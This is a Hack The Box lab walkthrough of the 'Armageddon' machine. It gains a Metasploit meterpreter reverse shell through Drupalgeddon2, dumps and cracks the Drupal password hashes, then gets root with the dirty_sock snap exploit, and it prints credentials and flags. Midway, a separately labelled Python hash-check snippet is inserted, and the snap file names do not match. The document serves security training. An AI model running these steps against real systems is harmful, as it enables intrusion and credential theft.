Hack-The-Box-walkthrough[Armageddon]

Introduction

OS: Linux
Difficulty: Easy
Points: 20
Release: 27 Mar 2021
IP: 10.10.10.233

Information gathering

First, run nmap as usual.

┌──(root💀kali)-[~/hackthebox/machine/Armageddon]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.233
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)

So two ports are open: 22 (ssh) and 80 (http).

Port-80

There is a simple login page.
Let’s check the source code for some juicy stuff.

<meta name="Generator" content="Drupal 7 (http://drupal.org)" />

The generator meta tag reveals the Drupal version: Drupal 7.
Let's search Google for an exploit for this specific version.

I found a Rapid7 page:

  • Drupal Drupalgeddon 2 Forms API Property Injection

Let’s try this real quick.

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set lhost tun0
lhost => tun0
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 10.10.10.233
rhost => 10.10.10.233
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.233 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic (PHP In-Memory)


msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run

[*] Started reverse TCP handler on 10.10.14.5:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending stage (39282 bytes) to 10.10.10.233
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.233:59810) at 2021-03-29 07:57:22 -0400
id

meterpreter > id
[-] Unknown command: id.
meterpreter > getuid
Server username: (48)
meterpreter > pwd
/var/www/html
meterpreter > ls
Listing: /var/www/html
======================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 317 fil 2017-06-21 14:20:18 -0400 .editorconfig
100644/rw-r--r-- 174 fil 2017-06-21 14:20:18 -0400 .gitignore
100644/rw-r--r-- 6112 fil 2017-06-21 14:20:18 -0400 .htaccess
100644/rw-r--r-- 111613 fil 2017-06-21 14:20:18 -0400 CHANGELOG.txt
100644/rw-r--r-- 1481 fil 2017-06-21 14:20:18 -0400 COPYRIGHT.txt
100644/rw-r--r-- 1717 fil 2017-06-21 14:20:18 -0400 INSTALL.mysql.txt
100644/rw-r--r-- 1874 fil 2017-06-21 14:20:18 -0400 INSTALL.pgsql.txt
100644/rw-r--r-- 1298 fil 2017-06-21 14:20:18 -0400 INSTALL.sqlite.txt
100644/rw-r--r-- 17995 fil 2017-06-21 14:20:18 -0400 INSTALL.txt
100644/rw-r--r-- 18092 fil 2016-11-16 18:57:05 -0500 LICENSE.txt
100644/rw-r--r-- 8710 fil 2017-06-21 14:20:18 -0400 MAINTAINERS.txt
100644/rw-r--r-- 5382 fil 2017-06-21 14:20:18 -0400 README.txt
100644/rw-r--r-- 10123 fil 2017-06-21 14:20:18 -0400 UPGRADE.txt
100644/rw-r--r-- 6604 fil 2017-06-21 14:20:18 -0400 authorize.php
100644/rw-r--r-- 720 fil 2017-06-21 14:20:18 -0400 cron.php
40755/rwxr-xr-x 4096 dir 2017-06-21 14:20:18 -0400 includes
100644/rw-r--r-- 529 fil 2017-06-21 14:20:18 -0400 index.php
100644/rw-r--r-- 703 fil 2017-06-21 14:20:18 -0400 install.php
100777/rwxrwxrwx 119357 fil 2021-03-28 22:59:36 -0400 linlog.txt
40755/rwxr-xr-x 4096 dir 2020-12-04 05:10:24 -0500 misc
40755/rwxr-xr-x 4096 dir 2017-06-21 14:20:18 -0400 modules
40755/rwxr-xr-x 70 dir 2017-06-21 14:20:18 -0400 profiles
100644/rw-r--r-- 2189 fil 2017-06-21 14:20:18 -0400 robots.txt
40755/rwxr-xr-x 261 dir 2017-06-21 14:20:18 -0400 scripts
100755/rwxr-xr-x 55 fil 2021-03-28 22:43:06 -0400 shell.sh
40755/rwxr-xr-x 75 dir 2017-06-21 14:20:18 -0400 sites
40755/rwxr-xr-x 94 dir 2017-06-21 14:20:18 -0400 themes
100644/rw-r--r-- 19986 fil 2017-06-21 14:20:18 -0400 update.php
100644/rw-r--r-- 2200 fil 2017-06-21 14:20:18 -0400 web.config
100644/rw-r--r-- 417 fil 2017-06-21 14:20:18 -0400 xmlrpc.php

We got the shell.

Now let’s enumerate some good stuff.

I found an interesting file, settings.php, in the /var/www/html/sites/default/ directory; it contains the MySQL credentials.

meterpreter > ls
Listing: /var/www/html/sites/default
====================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 26250 fil 2017-06-21 14:20:18 -0400 default.settings.php
40775/rwxrwxr-x 37 dir 2020-12-03 07:32:39 -0500 files
100444/r--r--r-- 26565 fil 2020-12-03 07:32:37 -0500 settings.php

meterpreter > cat settings.php
'''
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupal',
'username' => 'drupaluser',
'password' => 'CQHEy@9M*m23gBVj',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
'''

But before connecting to MySQL, let's spawn a stable shell first.

The python3 TTY shell didn't spawn, so let's try connecting to MySQL without a TTY.

mysql -u drupaluser -pCQHEy@9M*m23gBVj -e 'show databases;'
Database
information_schema
drupal
mysql
performance_schema

It works. Let's list the tables in the drupal database.

mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'show tables;'
Tables_in_drupal
actions
authmap
batch
block
block_custom
block_node_type
block_role
blocked_ips
cache
cache_block
cache_bootstrap
cache_field
cache_filter
cache_form
cache_image
cache_menu
cache_page
cache_path
comment
date_format_locale
date_format_type
date_formats
field_config
field_config_instance
field_data_body
field_data_comment_body
field_data_field_image
field_data_field_tags
field_revision_body
field_revision_comment_body
field_revision_field_image
field_revision_field_tags
file_managed
file_usage
filter
filter_format
flood
history
image_effects
image_styles
menu_custom
menu_links
menu_router
node
node_access
node_comment_statistics
node_revision
node_type
queue
rdf_mapping
registry
registry_file
role
role_permission
search_dataset
search_index
search_node_links
search_total
semaphore
sequences
sessions
shortcut_set
shortcut_set_users
system
taxonomy_index
taxonomy_term_data
taxonomy_term_hierarchy
taxonomy_vocabulary
url_alias
users
users_roles
variable
watchdog

Now let's dump the usernames and password hashes from the users table.

mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'select name,pass from users;'
name pass

brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
hacker $S$DUnQhzNDVFOtAeb0JLMAtUesQM9iI1ZvcOixoulqd98XsmmEyE2b

Now that we have the hashes, let's try to crack them.

┌──(root💀kali)-[~/hackthebox/machine/Armageddon]
└─# john hash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
booboo (?)

We got the password: brucetherealadmin:booboo
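To see why john could crack this so quickly, here is an added example (my own code, not part of the original write-up) that reimplements Drupal 7's `$S$` password check in pure Python: the character after `$S$` encodes log2 of the SHA-512 iteration count ('D' is 15, hence the 32768 john reported), and the 8-character salt follows it. Rechecking the cracked password against the hash dumped from the users table takes only 32769 SHA-512 calls, which is exactly why a wordlist attack is cheap here.

```python
import hashlib
import hmac

# Drupal 7 password.inc: custom base64 alphabet and stored-hash length.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_LENGTH = 55

def _encode64(data: bytes) -> str:  # phpass-style base64: little-endian bit packing, Drupal's alphabet
    out, i, n = [], 0, len(data)
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= n:
            break
    return "".join(out)

def iteration_count(stored: str) -> int:
    """Char 4 is log2 of the SHA-512 iteration count: 'D' -> 2**15 = 32768."""
    log2 = ITOA64.index(stored[3])
    if not 7 <= log2 <= 30:  # DRUPAL_MIN_HASH_COUNT .. DRUPAL_MAX_HASH_COUNT
        raise ValueError("iteration count outside Drupal's accepted range")
    return 1 << log2

def drupal7_hash(password: str, setting: str) -> str:
    """Recompute a $S$ hash from its 12-char setting ($S$ + log2 char + 8-char salt)."""
    setting = setting[:12]
    if not setting.startswith("$S$"):
        raise ValueError("not a Drupal 7 SHA-512 hash")
    salt, pw = setting[4:12].encode(), password.encode()
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(iteration_count(setting)):  # PHP: do {...} while (--$count)
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _encode64(digest))[:DRUPAL_HASH_LENGTH]

def check_password(password: str, stored: str) -> bool:
    return hmac.compare_digest(drupal7_hash(password, stored), stored)  # constant-time compare
```

Calling `check_password("booboo", "$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt")` with the hash from the users table returns True.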

Let’s ssh in real quick and get the user.txt.

┌──(root💀kali)-[~/hackthebox/machine/Armageddon]
└─# ssh brucetherealadmin@10.10.10.233
The authenticity of host '10.10.10.233 (10.10.10.233)' can't be established.
ECDSA key fingerprint is SHA256:bC1R/FE5sI72ndY92lFyZQt4g1VJoSNKOeAkuuRr4Ao.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.233' (ECDSA) to the list of known hosts.
brucetherealadmin@10.10.10.233's password:
Last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5
[brucetherealadmin@armageddon ~]$ id
uid=1000(brucetherealadmin) gid=1000(brucetherealadmin) 组=1000(brucetherealadmin) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[brucetherealadmin@armageddon ~]$ whoami
brucetherealadmin
[brucetherealadmin@armageddon ~]$ ls
user.txt
[brucetherealadmin@armageddon ~]$ cat user.txt
da64e52c766febd51f05a14be029868f

Privilege escalation

Before running linpeas, let's check manually first.

[brucetherealadmin@armageddon ~]$ sudo -l
匹配 %2$s 上 %1$s 的默认条目:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME
HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

用户 brucetherealadmin 可以在 armageddon 上运行以下命令:
(root) NOPASSWD: /usr/bin/snap install *

Let's Google that sudo rule for a privilege escalation:

  • Privilege Escalation in Ubuntu Linux (dirty_sock exploit)
  • dirty_sockv2.py

The GitHub Python script doesn't work as-is in this case. From it we only need the base64 string: decode it and save it to a file.

[brucetherealadmin@armageddon tmp]$ python -c 'print "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" + "A" * 4256 + "=="' | base64 -d > dedsec.snap

Run the following commands and we get root.

[brucetherealadmin@armageddon tmp]$ ls
luci.snap
[brucetherealadmin@armageddon tmp]$ sudo /usr/bin/snap install --devmode luci.snap
dirty-sock 0.1 installed
[brucetherealadmin@armageddon tmp]$ su dirty_sock
密码:
[dirty_sock@armageddon tmp]$ sudo -i

我们信任您已经从系统管理员那里了解了日常注意事项。
总结起来无外乎这三点:

#1) 尊重别人的隐私。
#2) 输入前要先考虑(后果和风险)。
#3) 权力越大,责任越大。

[sudo] dirty_sock 的密码:
[root@armageddon ~]# id
uid=0(root) gid=0(root) 组=0(root) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@armageddon ~]# whoami
root
[root@armageddon ~]# ls
anaconda-ks.cfg cleanup.sh passwd reset.sh root.txt snap
[root@armageddon ~]# cat root.txt
2ff5df0cda6758a019dc1481ff002da1

Summary of knowledge

  • Got a shell with the Metasploit module Drupal Drupalgeddon 2 Forms API Property Injection
  • Cracked the Drupal7 hash with john
  • Privilege escalation via the dirty_sock exploit

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…